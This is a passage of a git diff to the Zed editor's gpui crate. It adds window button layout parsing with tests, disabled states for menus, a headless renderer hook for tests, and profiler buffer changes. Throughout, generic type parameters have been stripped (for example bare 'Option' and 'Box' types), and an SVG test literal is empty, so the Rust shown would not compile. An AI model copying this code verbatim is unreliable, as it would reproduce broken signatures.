"c")), + not(descendant(ident("d"), ident("e"))), + ), + eq("f", "g"), + ), + "a && b == c && !(d > e) && f == g", + ), + ( + and(and(ident("a"), or(ident("b"), ident("c"))), ident("d")), + "a && (b || c) && d", + ), + ( + or(or(ident("a"), and(ident("b"), ident("c"))), ident("d")), + "a || (b && c) || d", + ), + ]; + + for (predicate, expected) in test_cases { + let actual = predicate.to_string(); + assert_eq!(actual, expected); + let parsed = KeyBindingContextPredicate::parse(&actual).unwrap(); + assert_eq!(parsed, *predicate); + } + } } diff --git a/crates/gpui/src/platform.rs b/crates/gpui/src/platform.rs index a6714ff250f2f854c51d30bfea5e2e5911ce60ee..efca26a6b4802037a96490bf81f7d1c5c1d8b298 100644 --- a/crates/gpui/src/platform.rs +++ b/crates/gpui/src/platform.rs @@ -37,6 +37,8 @@ use crate::{ ThreadTaskTimings, Window, WindowControlArea, hash, point, px, size, }; use anyhow::Result; +#[cfg(any(target_os = "linux", target_os = "freebsd"))] +use anyhow::bail; use async_task::Runnable; use futures::channel::oneshot; #[cfg(any(test, feature = "test-support"))] @@ -78,6 +80,7 @@ pub use test::{TestDispatcher, TestScreenCaptureSource, TestScreenCaptureStream} #[cfg(all(target_os = "macos", any(test, feature = "test-support")))] pub use visual_test::VisualTestPlatform; +// TODO(jk): return an enum instead of a string /// Return which compositor we're guessing we'll use. /// Does not attempt to connect to the given compositor. #[cfg(any(target_os = "linux", target_os = "freebsd"))] @@ -155,6 +158,11 @@ pub trait Platform: 'static { /// Returns the appearance of the application's windows. fn window_appearance(&self) -> WindowAppearance; + /// Returns the window button layout configuration when supported. + fn button_layout(&self) -> Option { + None + } + fn open_url(&self, url: &str); fn on_open_urls(&self, callback: Box)>); fn register_url_scheme(&self, url: &str) -> Task>; @@ -406,6 +414,145 @@ impl Default for WindowControls { } } +/// A window control button type used in [`WindowButtonLayout`]. +#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] +pub enum WindowButton { + /// The minimize button + Minimize, + /// The maximize button + Maximize, + /// The close button + Close, +} + +impl WindowButton { + /// Returns a stable element ID for rendering this button. + pub fn id(&self) -> &'static str { + match self { + WindowButton::Minimize => "minimize", + WindowButton::Maximize => "maximize", + WindowButton::Close => "close", + } + } + + #[cfg(any(target_os = "linux", target_os = "freebsd"))] + fn index(&self) -> usize { + match self { + WindowButton::Minimize => 0, + WindowButton::Maximize => 1, + WindowButton::Close => 2, + } + } +} + +/// Maximum number of [`WindowButton`]s per side in the titlebar. +pub const MAX_BUTTONS_PER_SIDE: usize = 3; + +/// Describes which [`WindowButton`]s appear on each side of the titlebar. +/// +/// On Linux, this is read from the desktop environment's configuration +/// (e.g. GNOME's `gtk-decoration-layout` gsetting) via [`WindowButtonLayout::parse`]. +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub struct WindowButtonLayout { + /// Buttons on the left side of the titlebar. + pub left: [Option; MAX_BUTTONS_PER_SIDE], + /// Buttons on the right side of the titlebar. + pub right: [Option; MAX_BUTTONS_PER_SIDE], +} + +#[cfg(any(target_os = "linux", target_os = "freebsd"))] +impl WindowButtonLayout { + /// Returns Zed's built-in fallback button layout for Linux titlebars. + pub fn linux_default() -> Self { + Self { + left: [None; MAX_BUTTONS_PER_SIDE], + right: [ + Some(WindowButton::Minimize), + Some(WindowButton::Maximize), + Some(WindowButton::Close), + ], + } + } + + /// Parses a GNOME-style `button-layout` string (e.g. `"close,minimize:maximize"`). + pub fn parse(layout_string: &str) -> Result { + fn parse_side( + s: &str, + seen_buttons: &mut [bool; MAX_BUTTONS_PER_SIDE], + unrecognized: &mut Vec, + ) -> [Option; MAX_BUTTONS_PER_SIDE] { + let mut result = [None; MAX_BUTTONS_PER_SIDE]; + let mut i = 0; + for name in s.split(',') { + let trimmed = name.trim(); + if trimmed.is_empty() { + continue; + } + let button = match trimmed { + "minimize" => Some(WindowButton::Minimize), + "maximize" => Some(WindowButton::Maximize), + "close" => Some(WindowButton::Close), + other => { + unrecognized.push(other.to_string()); + None + } + }; + if let Some(button) = button { + if seen_buttons[button.index()] { + continue; + } + if let Some(slot) = result.get_mut(i) { + *slot = Some(button); + seen_buttons[button.index()] = true; + i += 1; + } + } + } + result + } + + let (left_str, right_str) = layout_string.split_once(':').unwrap_or(("", layout_string)); + let mut unrecognized = Vec::new(); + let mut seen_buttons = [false; MAX_BUTTONS_PER_SIDE]; + let layout = Self { + left: parse_side(left_str, &mut seen_buttons, &mut unrecognized), + right: parse_side(right_str, &mut seen_buttons, &mut unrecognized), + }; + + if !unrecognized.is_empty() + && layout.left.iter().all(Option::is_none) + && layout.right.iter().all(Option::is_none) + { + bail!( + "button layout string {:?} contains no valid buttons (unrecognized: {})", + layout_string, + unrecognized.join(", ") + ); + } + + Ok(layout) + } + + /// Formats the layout back into a GNOME-style `button-layout` string. + #[cfg(test)] + pub fn format(&self) -> String { + fn format_side(buttons: &[Option; MAX_BUTTONS_PER_SIDE]) -> String { + buttons + .iter() + .flatten() + .map(|button| match button { + WindowButton::Minimize => "minimize", + WindowButton::Maximize => "maximize", + WindowButton::Close => "close", + }) + .collect::>() + .join(",") + } + + format!("{}:{}", format_side(&self.left), format_side(&self.right)) + } +} + /// A type to describe which sides of the window are currently tiled in some way #[derive(Debug, Copy, Clone, Eq, PartialEq, Hash, Default)] pub struct Tiling { @@ -487,6 +634,7 @@ pub trait PlatformWindow: HasWindowHandle + HasDisplayHandle { fn on_hit_test_window_control(&self, callback: Box Option>); fn on_close(&self, callback: Box); fn on_appearance_changed(&self, callback: Box); + fn on_button_layout_changed(&self, _callback: Box) {} fn draw(&self, scene: &Scene); fn completed_frame(&self) {} fn sprite_atlas(&self) -> Arc; @@ -541,6 +689,8 @@ pub trait PlatformWindow: HasWindowHandle + HasDisplayHandle { fn update_ime_position(&self, _bounds: Bounds); + fn play_system_bell(&self) {} + #[cfg(any(test, feature = "test-support"))] fn as_test(&mut self) -> Option<&mut TestWindow> { None @@ -555,6 +705,20 @@ pub trait PlatformWindow: HasWindowHandle + HasDisplayHandle { } } +/// A renderer for headless windows that can produce real rendered output. +#[cfg(any(test, feature = "test-support"))] +pub trait PlatformHeadlessRenderer { + /// Render a scene and return the result as an RGBA image. + fn render_scene_to_image( + &mut self, + scene: &Scene, + size: Size, + ) -> Result; + + /// Returns the sprite atlas used by this renderer. + fn sprite_atlas(&self) -> Arc; +} + /// Type alias for runnables with metadata. /// Previously an enum with a single variant, now simplified to a direct type alias. #[doc(hidden)] @@ -573,6 +737,7 @@ pub trait PlatformDispatcher: Send + Sync { fn dispatch(&self, runnable: RunnableVariant, priority: Priority); fn dispatch_on_main_thread(&self, runnable: RunnableVariant, priority: Priority); fn dispatch_after(&self, duration: Duration, runnable: RunnableVariant); + fn spawn_realtime(&self, f: Box); fn now(&self) -> Instant { @@ -592,19 +757,29 @@ pub trait PlatformDispatcher: Send + Sync { #[expect(missing_docs)] pub trait PlatformTextSystem: Send + Sync { fn add_fonts(&self, fonts: Vec>) -> Result<()>; + /// Get all available font names. fn all_font_names(&self) -> Vec; + /// Get the font ID for a font descriptor. fn font_id(&self, descriptor: &Font) -> Result; + /// Get metrics for a font. fn font_metrics(&self, font_id: FontId) -> FontMetrics; + /// Get typographic bounds for a glyph. fn typographic_bounds(&self, font_id: FontId, glyph_id: GlyphId) -> Result>; + /// Get the advance width for a glyph. fn advance(&self, font_id: FontId, glyph_id: GlyphId) -> Result>; + /// Get the glyph ID for a character. fn glyph_for_char(&self, font_id: FontId, ch: char) -> Option; + /// Get raster bounds for a glyph. fn glyph_raster_bounds(&self, params: &RenderGlyphParams) -> Result>; + /// Rasterize a glyph. fn rasterize_glyph( &self, params: &RenderGlyphParams, raster_bounds: Bounds, ) -> Result<(Size, Vec)>; + /// Layout a line of text with the given font runs. fn layout_line(&self, text: &str, font_size: Pixels, runs: &[FontRun]) -> LineLayout; + /// Returns the recommended text rendering mode for the given font and size. fn recommended_rendering_mode(&self, _font_id: FontId, _font_size: Pixels) -> TextRenderingMode; } @@ -1062,6 +1237,20 @@ impl PlatformInputHandler { pub fn accepts_text_input(&mut self, window: &mut Window, cx: &mut App) -> bool { self.handler.accepts_text_input(window, cx) } + + #[allow(dead_code)] + pub fn query_accepts_text_input(&mut self) -> bool { + self.cx + .update(|window, cx| self.handler.accepts_text_input(window, cx)) + .unwrap_or(true) + } + + #[allow(dead_code)] + pub fn query_prefers_ime_for_printable_keys(&mut self) -> bool { + self.cx + .update(|window, cx| self.handler.prefers_ime_for_printable_keys(window, cx)) + .unwrap_or(false) + } } /// A struct representing a selection in a text buffer, in UTF16 characters. @@ -1175,6 +1364,18 @@ pub trait InputHandler: 'static { fn accepts_text_input(&mut self, _window: &mut Window, _cx: &mut App) -> bool { true } + + /// Returns whether printable keys should be routed to the IME before keybinding + /// matching when a non-ASCII input source (e.g. Japanese, Korean, Chinese IME) + /// is active. This prevents multi-stroke keybindings like `jj` from intercepting + /// keys that the IME should compose. + /// + /// Defaults to `false`. The editor overrides this based on whether it expects + /// character input (e.g. Vim insert mode returns `true`, normal mode returns `false`). + /// The terminal keeps the default `false` so that raw keys reach the terminal process. + fn prefers_ime_for_printable_keys(&mut self, _window: &mut Window, _cx: &mut App) -> bool { + false + } } /// The variables that can be configured when creating a new window @@ -1909,7 +2110,7 @@ impl Image { ImageFormat::Ico => frames_for_image(&self.bytes, image::ImageFormat::Ico)?, ImageFormat::Svg => { return svg_renderer - .render_single_frame(&self.bytes, 1.0, false) + .render_single_frame(&self.bytes, 1.0) .map_err(Into::into); } }; @@ -1990,3 +2191,209 @@ impl From for ClipboardString { } } } + +#[cfg(test)] +mod image_tests { + use super::*; + use std::sync::Arc; + + #[test] + fn test_svg_image_to_image_data_converts_to_bgra() { + let image = Image::from_bytes( + ImageFormat::Svg, + br##" + +"## + .to_vec(), + ); + + let render_image = image.to_image_data(SvgRenderer::new(Arc::new(()))).unwrap(); + let bytes = render_image.as_bytes(0).unwrap(); + + for pixel in bytes.chunks_exact(4) { + assert_eq!(pixel, &[0xF8, 0xBD, 0x38, 0xFF]); + } + } +} + +#[cfg(all(test, any(target_os = "linux", target_os = "freebsd")))] +mod tests { + use super::*; + use std::collections::HashSet; + + #[test] + fn test_window_button_layout_parse_standard() { + let layout = WindowButtonLayout::parse("close,minimize:maximize").unwrap(); + assert_eq!( + layout.left, + [ + Some(WindowButton::Close), + Some(WindowButton::Minimize), + None + ] + ); + assert_eq!(layout.right, [Some(WindowButton::Maximize), None, None]); + } + + #[test] + fn test_window_button_layout_parse_right_only() { + let layout = WindowButtonLayout::parse("minimize,maximize,close").unwrap(); + assert_eq!(layout.left, [None, None, None]); + assert_eq!( + layout.right, + [ + Some(WindowButton::Minimize), + Some(WindowButton::Maximize), + Some(WindowButton::Close) + ] + ); + } + + #[test] + fn test_window_button_layout_parse_left_only() { + let layout = WindowButtonLayout::parse("close,minimize,maximize:").unwrap(); + assert_eq!( + layout.left, + [ + Some(WindowButton::Close), + Some(WindowButton::Minimize), + Some(WindowButton::Maximize) + ] + ); + assert_eq!(layout.right, [None, None, None]); + } + + #[test] + fn test_window_button_layout_parse_with_whitespace() { + let layout = WindowButtonLayout::parse(" close , minimize : maximize ").unwrap(); + assert_eq!( + layout.left, + [ + Some(WindowButton::Close), + Some(WindowButton::Minimize), + None + ] + ); + assert_eq!(layout.right, [Some(WindowButton::Maximize), None, None]); + } + + #[test] + fn test_window_button_layout_parse_empty() { + let layout = WindowButtonLayout::parse("").unwrap(); + assert_eq!(layout.left, [None, None, None]); + assert_eq!(layout.right, [None, None, None]); + } + + #[test] + fn test_window_button_layout_parse_intentionally_empty() { + let layout = WindowButtonLayout::parse(":").unwrap(); + assert_eq!(layout.left, [None, None, None]); + assert_eq!(layout.right, [None, None, None]); + } + + #[test] + fn test_window_button_layout_parse_invalid_buttons() { + let layout = WindowButtonLayout::parse("close,invalid,minimize:maximize,foo").unwrap(); + assert_eq!( + layout.left, + [ + Some(WindowButton::Close), + Some(WindowButton::Minimize), + None + ] + ); + assert_eq!(layout.right, [Some(WindowButton::Maximize), None, None]); + } + + #[test] + fn test_window_button_layout_parse_deduplicates_same_side_buttons() { + let layout = WindowButtonLayout::parse("close,close,minimize").unwrap(); + assert_eq!( + layout.right, + [ + Some(WindowButton::Close), + Some(WindowButton::Minimize), + None + ] + ); + assert_eq!(layout.format(), ":close,minimize"); + } + + #[test] + fn test_window_button_layout_parse_deduplicates_buttons_across_sides() { + let layout = WindowButtonLayout::parse("close:maximize,close,minimize").unwrap(); + assert_eq!(layout.left, [Some(WindowButton::Close), None, None]); + assert_eq!( + layout.right, + [ + Some(WindowButton::Maximize), + Some(WindowButton::Minimize), + None + ] + ); + + let button_ids: Vec<_> = layout + .left + .iter() + .chain(layout.right.iter()) + .flatten() + .map(WindowButton::id) + .collect(); + let unique_button_ids = button_ids.iter().copied().collect::>(); + assert_eq!(unique_button_ids.len(), button_ids.len()); + assert_eq!(layout.format(), "close:maximize,minimize"); + } + + #[test] + fn test_window_button_layout_parse_gnome_style() { + let layout = WindowButtonLayout::parse("close").unwrap(); + assert_eq!(layout.left, [None, None, None]); + assert_eq!(layout.right, [Some(WindowButton::Close), None, None]); + } + + #[test] + fn test_window_button_layout_parse_elementary_style() { + let layout = WindowButtonLayout::parse("close:maximize").unwrap(); + assert_eq!(layout.left, [Some(WindowButton::Close), None, None]); + assert_eq!(layout.right, [Some(WindowButton::Maximize), None, None]); + } + + #[test] + fn test_window_button_layout_round_trip() { + let cases = [ + "close:minimize,maximize", + "minimize,maximize,close:", + ":close", + "close:", + "close:maximize", + ":", + ]; + + for case in cases { + let layout = WindowButtonLayout::parse(case).unwrap(); + assert_eq!(layout.format(), case, "Round-trip failed for: {}", case); + } + } + + #[test] + fn test_window_button_layout_linux_default() { + let layout = WindowButtonLayout::linux_default(); + assert_eq!(layout.left, [None, None, None]); + assert_eq!( + layout.right, + [ + Some(WindowButton::Minimize), + Some(WindowButton::Maximize), + Some(WindowButton::Close) + ] + ); + + let round_tripped = WindowButtonLayout::parse(&layout.format()).unwrap(); + assert_eq!(round_tripped, layout); + } + + #[test] + fn test_window_button_layout_parse_all_invalid() { + assert!(WindowButtonLayout::parse("asdfghjkl").is_err()); + } +} diff --git a/crates/gpui/src/platform/app_menu.rs b/crates/gpui/src/platform/app_menu.rs index b1e0d82bb9f6d4ee265d047f562e088a8e48c1db..27c20c00badc50a965560073885f09a4e271ce5e 100644 --- a/crates/gpui/src/platform/app_menu.rs +++ b/crates/gpui/src/platform/app_menu.rs @@ -7,14 +7,39 @@ pub struct Menu { /// The items in the menu pub items: Vec, + + /// Whether this menu is disabled + pub disabled: bool, } impl Menu { + /// Create a new Menu with the given name + pub fn new(name: impl Into) -> Self { + Self { + name: name.into(), + items: vec![], + disabled: false, + } + } + + /// Set items to be in this menu + pub fn items(mut self, items: impl IntoIterator) -> Self { + self.items = items.into_iter().collect(); + self + } + + /// Set whether this menu is disabled + pub fn disabled(mut self, disabled: bool) -> Self { + self.disabled = disabled; + self + } + /// Create an OwnedMenu from this Menu pub fn owned(self) -> OwnedMenu { OwnedMenu { name: self.name.to_string().into(), items: self.items.into_iter().map(|item| item.owned()).collect(), + disabled: self.disabled, } } } @@ -72,6 +97,9 @@ pub enum MenuItem { /// Whether this action is checked checked: bool, + + /// Whether this action is disabled + disabled: bool, }, } @@ -101,6 +129,7 @@ impl MenuItem { action: Box::new(action), os_action: None, checked: false, + disabled: false, } } @@ -115,6 +144,7 @@ impl MenuItem { action: Box::new(action), os_action: Some(os_action), checked: false, + disabled: false, } } @@ -128,11 +158,13 @@ impl MenuItem { action, os_action, checked, + disabled, } => OwnedMenuItem::Action { name: name.into(), action, os_action, checked, + disabled, }, MenuItem::SystemMenu(os_menu) => OwnedMenuItem::SystemMenu(os_menu.owned()), } @@ -142,19 +174,49 @@ impl MenuItem { /// /// Only for [`MenuItem::Action`], otherwise, will be ignored pub fn checked(mut self, checked: bool) -> Self { + match &mut self { + MenuItem::Action { checked: old, .. } => { + *old = checked; + } + _ => {} + } + self + } + + /// Returns whether this menu item is checked + /// + /// Only for [`MenuItem::Action`], otherwise, returns false + #[inline] + pub fn is_checked(&self) -> bool { match self { - MenuItem::Action { - action, - os_action, - name, - .. - } => MenuItem::Action { - name, - action, - os_action, - checked, - }, - _ => self, + MenuItem::Action { checked, .. } => *checked, + _ => false, + } + } + + /// Set whether this menu item is disabled + pub fn disabled(mut self, disabled: bool) -> Self { + match &mut self { + MenuItem::Action { disabled: old, .. } => { + *old = disabled; + } + MenuItem::Submenu(submenu) => { + submenu.disabled = disabled; + } + _ => {} + } + self + } + + /// Returns whether this menu item is disabled + /// + /// Only for [`MenuItem::Action`] and [`MenuItem::Submenu`], otherwise, returns false + #[inline] + pub fn is_disabled(&self) -> bool { + match self { + MenuItem::Action { disabled, .. } => *disabled, + MenuItem::Submenu(submenu) => submenu.disabled, + _ => false, } } } @@ -179,6 +241,9 @@ pub struct OwnedMenu { /// The items in the menu pub items: Vec, + + /// Whether this menu is disabled + pub disabled: bool, } /// The different kinds of items that can be in a menu @@ -206,6 +271,9 @@ pub enum OwnedMenuItem { /// Whether this action is checked checked: bool, + + /// Whether this action is disabled + disabled: bool, }, } @@ -219,11 +287,13 @@ impl Clone for OwnedMenuItem { action, os_action, checked, + disabled, } => OwnedMenuItem::Action { name: name.clone(), action: action.boxed_clone(), os_action: *os_action, checked: *checked, + disabled: *disabled, }, OwnedMenuItem::SystemMenu(os_menu) => OwnedMenuItem::SystemMenu(os_menu.clone()), } @@ -287,3 +357,70 @@ pub(crate) fn init_app_menus(platform: &dyn Platform, cx: &App) { } })); } + +#[cfg(test)] +mod tests { + use crate::Menu; + + #[test] + fn test_menu() { + let menu = Menu::new("App") + .items(vec![ + crate::MenuItem::action("Action 1", gpui::NoAction), + crate::MenuItem::separator(), + ]) + .disabled(true); + + assert_eq!(menu.name.as_ref(), "App"); + assert_eq!(menu.items.len(), 2); + assert!(menu.disabled); + } + + #[test] + fn test_menu_item_builder() { + use super::MenuItem; + + let item = MenuItem::action("Test Action", gpui::NoAction); + assert_eq!( + match &item { + MenuItem::Action { name, .. } => name.as_ref(), + _ => unreachable!(), + }, + "Test Action" + ); + assert!(matches!( + item, + MenuItem::Action { + checked: false, + disabled: false, + .. + } + )); + + assert!( + MenuItem::action("Test Action", gpui::NoAction) + .checked(true) + .is_checked() + ); + assert!( + MenuItem::action("Test Action", gpui::NoAction) + .disabled(true) + .is_disabled() + ); + + let submenu = MenuItem::submenu(super::Menu { + name: "Submenu".into(), + items: vec![], + disabled: true, + }); + assert_eq!( + match &submenu { + MenuItem::Submenu(menu) => menu.name.as_ref(), + _ => unreachable!(), + }, + "Submenu" + ); + assert!(!submenu.is_checked()); + assert!(submenu.is_disabled()); + } +} diff --git a/crates/gpui/src/platform/test/dispatcher.rs b/crates/gpui/src/platform/test/dispatcher.rs index 081f5feab014b3712fa23290038f34d8ed4f5a92..29aff84ff9d07f3a558ab68f2ac3117835688cc8 100644 --- a/crates/gpui/src/platform/test/dispatcher.rs +++ b/crates/gpui/src/platform/test/dispatcher.rs @@ -30,11 +30,12 @@ impl TestDispatcher { .map_or(false, |var| var == "1" || var == "true"), timeout_ticks: 0..=1000, })); + Self::from_scheduler(scheduler) + } - let session_id = scheduler.allocate_session_id(); - + pub fn from_scheduler(scheduler: Arc) -> Self { TestDispatcher { - session_id, + session_id: scheduler.allocate_session_id(), scheduler, num_cpus_override: Arc::new(AtomicUsize::new(0)), } @@ -48,6 +49,10 @@ impl TestDispatcher { self.session_id } + pub fn drain_tasks(&self) { + self.scheduler.drain_tasks(); + } + pub fn advance_clock(&self, by: Duration) { self.scheduler.advance_clock(by); } @@ -72,6 +77,14 @@ impl TestDispatcher { while self.tick(false) {} } + pub fn allow_parking(&self) { + self.scheduler.allow_parking(); + } + + pub fn forbid_parking(&self) { + self.scheduler.forbid_parking(); + } + /// Override the value returned by `BackgroundExecutor::num_cpus()` in tests. /// A value of 0 means no override (the default of 4 is used). pub fn set_num_cpus(&self, count: usize) { diff --git a/crates/gpui/src/platform/test/platform.rs b/crates/gpui/src/platform/test/platform.rs index 1da42f5742215f9001dcbd09cc42977ea28623ea..a59b21f038a01b48686ee211919afd7c647b7331 100644 --- a/crates/gpui/src/platform/test/platform.rs +++ b/crates/gpui/src/platform/test/platform.rs @@ -1,9 +1,9 @@ use crate::{ AnyWindowHandle, BackgroundExecutor, ClipboardItem, CursorStyle, DevicePixels, DummyKeyboardMapper, ForegroundExecutor, Keymap, NoopTextSystem, Platform, PlatformDisplay, - PlatformKeyboardLayout, PlatformKeyboardMapper, PlatformTextSystem, PromptButton, - ScreenCaptureFrame, ScreenCaptureSource, ScreenCaptureStream, SourceMetadata, Task, - TestDisplay, TestWindow, ThermalState, WindowAppearance, WindowParams, size, + PlatformHeadlessRenderer, PlatformKeyboardLayout, PlatformKeyboardMapper, PlatformTextSystem, + PromptButton, ScreenCaptureFrame, ScreenCaptureSource, ScreenCaptureStream, SourceMetadata, + Task, TestDisplay, TestWindow, ThermalState, WindowAppearance, WindowParams, size, }; use anyhow::Result; use collections::VecDeque; @@ -34,6 +34,7 @@ pub(crate) struct TestPlatform { pub opened_url: RefCell>, pub text_system: Arc, pub expect_restart: RefCell>>>, + headless_renderer_factory: Option Option>>>, weak: Weak, } @@ -88,8 +89,30 @@ pub(crate) struct TestPrompts { impl TestPlatform { pub fn new(executor: BackgroundExecutor, foreground_executor: ForegroundExecutor) -> Rc { - let text_system = Arc::new(NoopTextSystem); - + Self::with_platform( + executor, + foreground_executor, + Arc::new(NoopTextSystem), + None, + ) + } + + pub fn with_text_system( + executor: BackgroundExecutor, + foreground_executor: ForegroundExecutor, + text_system: Arc, + ) -> Rc { + Self::with_platform(executor, foreground_executor, text_system, None) + } + + pub fn with_platform( + executor: BackgroundExecutor, + foreground_executor: ForegroundExecutor, + text_system: Arc, + headless_renderer_factory: Option< + Box Option>>, + >, + ) -> Rc { Rc::new_cyclic(|weak| TestPlatform { background_executor: executor, foreground_executor, @@ -107,6 +130,7 @@ impl TestPlatform { weak: weak.clone(), opened_url: Default::default(), text_system, + headless_renderer_factory, }) } @@ -299,11 +323,13 @@ impl Platform for TestPlatform { handle: AnyWindowHandle, params: WindowParams, ) -> anyhow::Result> { + let renderer = self.headless_renderer_factory.as_ref().and_then(|f| f()); let window = TestWindow::new( handle, params, self.weak.clone(), self.active_display.clone(), + renderer, ); Ok(Box::new(window)) } diff --git a/crates/gpui/src/platform/test/window.rs b/crates/gpui/src/platform/test/window.rs index feb3b162abe09d8cdef008aa9f794b046da22cc6..583450c9e93e6bfdf8f45a4dcd1a83feb9b08111 100644 --- a/crates/gpui/src/platform/test/window.rs +++ b/crates/gpui/src/platform/test/window.rs @@ -1,10 +1,12 @@ use crate::{ - AnyWindowHandle, AtlasKey, AtlasTextureId, AtlasTile, Bounds, DispatchEventResult, GpuSpecs, - Pixels, PlatformAtlas, PlatformDisplay, PlatformInput, PlatformInputHandler, PlatformWindow, - Point, PromptButton, RequestFrameOptions, Size, TestPlatform, TileId, WindowAppearance, + AnyWindowHandle, AtlasKey, AtlasTextureId, AtlasTile, Bounds, DevicePixels, + DispatchEventResult, GpuSpecs, Pixels, PlatformAtlas, PlatformDisplay, + PlatformHeadlessRenderer, PlatformInput, PlatformInputHandler, PlatformWindow, Point, + PromptButton, RequestFrameOptions, Scene, Size, TestPlatform, TileId, WindowAppearance, WindowBackgroundAppearance, WindowBounds, WindowControlArea, WindowParams, }; use collections::HashMap; +use image::RgbaImage; use parking_lot::Mutex; use raw_window_handle::{HasDisplayHandle, HasWindowHandle}; use std::{ @@ -21,6 +23,7 @@ pub(crate) struct TestWindowState { platform: Weak, // TODO: Replace with `Rc` sprite_atlas: Arc, + renderer: Option>, pub(crate) should_close_handler: Option bool>>, hit_test_window_control_callback: Option Option>>, input_callback: Option DispatchEventResult>>, @@ -57,13 +60,19 @@ impl TestWindow { params: WindowParams, platform: Weak, display: Rc, + renderer: Option>, ) -> Self { + let sprite_atlas: Arc = match &renderer { + Some(r) => r.sprite_atlas(), + None => Arc::new(TestAtlas::new()), + }; Self(Rc::new(Mutex::new(TestWindowState { bounds: params.bounds, display, platform, handle, - sprite_atlas: Arc::new(TestAtlas::new()), + sprite_atlas, + renderer, title: Default::default(), edited: false, should_close_handler: None, @@ -81,10 +90,11 @@ impl TestWindow { pub fn simulate_resize(&mut self, size: Size) { let scale_factor = self.scale_factor(); let mut lock = self.0.lock(); + // Always update bounds, even if no callback is registered + lock.bounds.size = size; let Some(mut callback) = lock.resize_callback.take() else { return; }; - lock.bounds.size = size; drop(lock); callback(size, scale_factor); self.0.lock().resize_callback = Some(callback); @@ -275,12 +285,25 @@ impl PlatformWindow for TestWindow { fn on_appearance_changed(&self, _callback: Box) {} - fn draw(&self, _scene: &crate::Scene) {} + fn draw(&self, _scene: &Scene) {} fn sprite_atlas(&self) -> sync::Arc { self.0.lock().sprite_atlas.clone() } + #[cfg(any(test, feature = "test-support"))] + fn render_to_image(&self, scene: &Scene) -> anyhow::Result { + let mut state = self.0.lock(); + let size = state.bounds.size; + if let Some(renderer) = &mut state.renderer { + let scale_factor = 2.0; + let device_size: Size = size.to_device_pixels(scale_factor); + renderer.render_scene_to_image(scene, device_size) + } else { + anyhow::bail!("render_to_image not available: no HeadlessRenderer configured") + } + } + fn as_test(&mut self) -> Option<&mut TestWindow> { Some(self) } diff --git a/crates/gpui/src/platform_scheduler.rs b/crates/gpui/src/platform_scheduler.rs index 900cd6041d38380f4d9cb3ff9b87a3605b0ebd78..0087c588d8d6381fa1fe590a2366c2e35ffe0a7a 100644 --- a/crates/gpui/src/platform_scheduler.rs +++ b/crates/gpui/src/platform_scheduler.rs @@ -109,16 +109,13 @@ impl Scheduler for PlatformScheduler { #[track_caller] fn timer(&self, duration: Duration) -> Timer { - use std::sync::{Arc, atomic::AtomicBool}; - let (tx, rx) = oneshot::channel(); let dispatcher = self.dispatcher.clone(); // Create a runnable that will send the completion signal let location = std::panic::Location::caller(); - let closed = Arc::new(AtomicBool::new(false)); let (runnable, _task) = async_task::Builder::new() - .metadata(RunnableMeta { location, closed }) + .metadata(RunnableMeta { location }) .spawn( move |_| async move { let _ = tx.send(()); diff --git a/crates/gpui/src/profiler.rs b/crates/gpui/src/profiler.rs index ccbc86e3fe35a095b2de9de159286250a24d7a05..1405b4d04964f5497bb4d7f865d6c4405507b43d 100644 --- a/crates/gpui/src/profiler.rs +++ b/crates/gpui/src/profiler.rs @@ -1,9 +1,8 @@ use scheduler::Instant; use std::{ cell::LazyCell, - collections::HashMap, - hash::Hasher, - hash::{DefaultHasher, Hash}, + collections::{HashMap, VecDeque}, + hash::{DefaultHasher, Hash, Hasher}, sync::Arc, thread::ThreadId, }; @@ -45,7 +44,6 @@ impl ThreadTaskTimings { let timings = &timings.timings; let mut vec = Vec::with_capacity(timings.len()); - let (s1, s2) = timings.as_slices(); vec.extend_from_slice(s1); vec.extend_from_slice(s2); @@ -169,7 +167,7 @@ pub struct ThreadTimingsDelta { #[doc(hidden)] pub struct ProfilingCollector { startup_time: Instant, - cursors: HashMap, + cursors: HashMap, } impl ProfilingCollector { @@ -195,7 +193,7 @@ impl ProfilingCollector { thread.thread_id.hash(&mut hasher); let hashed_id = hasher.finish(); - let prev_cursor = self.cursors.get(&hashed_id).copied().unwrap_or(0); + let prev_cursor = self.cursors.get(&thread.thread_id).copied().unwrap_or(0); let buffer_len = thread.timings.len() as u64; let buffer_start = thread.total_pushed.saturating_sub(buffer_len); @@ -205,7 +203,7 @@ impl ProfilingCollector { thread.timings.as_slice() } else { let skip = (prev_cursor - buffer_start) as usize; - &thread.timings[skip..] + &thread.timings[skip.min(thread.timings.len())..] }; // Don't emit the last entry if it's still in-progress (end: None). @@ -215,12 +213,12 @@ impl ProfilingCollector { } let cursor_advance = if incomplete_at_end { - thread.total_pushed - 1 + thread.total_pushed.saturating_sub(1) } else { thread.total_pushed }; - self.cursors.insert(hashed_id, cursor_advance); + self.cursors.insert(thread.thread_id, cursor_advance); if slice.is_empty() { continue; @@ -243,11 +241,14 @@ impl ProfilingCollector { } } -// Allow 20mb of task timing entries -const MAX_TASK_TIMINGS: usize = (20 * 1024 * 1024) / core::mem::size_of::(); +// Allow 16MiB of task timing entries. +// VecDeque grows by doubling its capacity when full, so keep this a power of 2 to avoid wasting +// memory. +const MAX_TASK_TIMINGS: usize = (16 * 1024 * 1024) / core::mem::size_of::(); #[doc(hidden)] -pub type TaskTimings = circular_buffer::CircularBuffer; +pub(crate) type TaskTimings = VecDeque; + #[doc(hidden)] pub type GuardedTaskTimings = spin::Mutex; @@ -287,7 +288,7 @@ thread_local! { pub struct ThreadTimings { pub thread_name: Option, pub thread_id: ThreadId, - pub timings: Box, + pub timings: TaskTimings, pub total_pushed: u64, } @@ -296,10 +297,38 @@ impl ThreadTimings { ThreadTimings { thread_name, thread_id, - timings: TaskTimings::boxed(), + timings: TaskTimings::new(), total_pushed: 0, } } + + /// If this task is the same as the last task, update the end time of the last task. + /// + /// Otherwise, add the new task timing to the list. + pub fn add_task_timing(&mut self, timing: TaskTiming) { + if let Some(last_timing) = self.timings.back_mut() + && last_timing.location == timing.location + && last_timing.start == timing.start + { + last_timing.end = timing.end; + } else { + while self.timings.len() + 1 > MAX_TASK_TIMINGS { + // This should only ever pop one element because it matches the insertion below. + self.timings.pop_front(); + } + self.timings.push_back(timing); + self.total_pushed += 1; + } + } + + pub fn get_thread_task_timings(&self) -> ThreadTaskTimings { + ThreadTaskTimings { + thread_name: self.thread_name.clone(), + thread_id: self.thread_id, + timings: self.timings.iter().cloned().collect(), + total_pushed: self.total_pushed, + } + } } impl Drop for ThreadTimings { @@ -318,19 